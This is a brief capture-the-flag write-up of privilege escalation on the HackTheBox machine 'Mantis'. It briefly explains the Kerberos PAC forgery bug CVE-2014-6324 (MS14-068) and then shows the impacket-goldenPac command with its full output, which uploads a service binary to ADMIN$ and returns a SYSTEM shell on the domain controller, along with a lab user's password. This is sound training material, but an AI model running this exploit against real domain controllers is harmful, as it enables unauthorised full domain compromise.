InfoSec LAB

Mantis_Privilege_Escalation_2

Created: 2 min read

CVE-2014-6324 (GoldenPac)

according to mitre, CVE-2014-6324 is a bug in KDC that allows an attacker to forge a PAC (Privileged Attribute Certificate)

  • is an extension to Kerberos protocol for proper rights management in Active Directory
  • is found in and base of every tickets (TGT or TGS)
  • is encrypted either with the KDC key or with the requested service account’s key
  • can be considered as the user’s security badge: He can use it to open doors, but he cannot open doors to which he does not have access

microsoft also updated a security bulletin, ms14–068, to this vulnerability

impacket-goldenPac is the tool that automates the whole process

I will get to it as all it needs is a domain user

┌──(kali㉿kali)-[~/archive/htb/labs/mantis]
└─$ impacket-goldenPac htb.local/james@mantis.htb.local -target-ip $IP -dc-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
password: J@m3s_P@ssW0rd!
[*] user sid: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] forest sid: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller 10.10.10.52
[*] 10.10.10.52 found vulnerable!
[*] Requesting shares on 10.10.10.52.....
[*] Found writable share ADMIN$
[*] Uploading file OGiBnuIR.exe
[*] Opening SVCManager on 10.10.10.52.....
[*] Creating service TGJB on 10.10.10.52.....
[*] Starting service TGJB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 
c:\Windows\system32> whoami
nt authority\system
 
c:\Windows\system32> hostname
mantis
 
c:\Windows\system32> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter local area connection:
 
   connection-specific dns suffix  . : 
   ipv6 address. . . . . . . . . . . : dead:beef::ac61:2d8f:a212:6372
   link-local ipv6 address . . . . . : fe80::ac61:2d8f:a212:6372%11
   ipv4 address. . . . . . . . . . . : 10.10.10.52
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%11
                                       10.10.10.2
 
tunnel adapter isatap.{f163287b-37d4-42ac-8358-59bd4fbfbe46}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . :

Domain Level Compromise

Interactive Graph View

Backlinks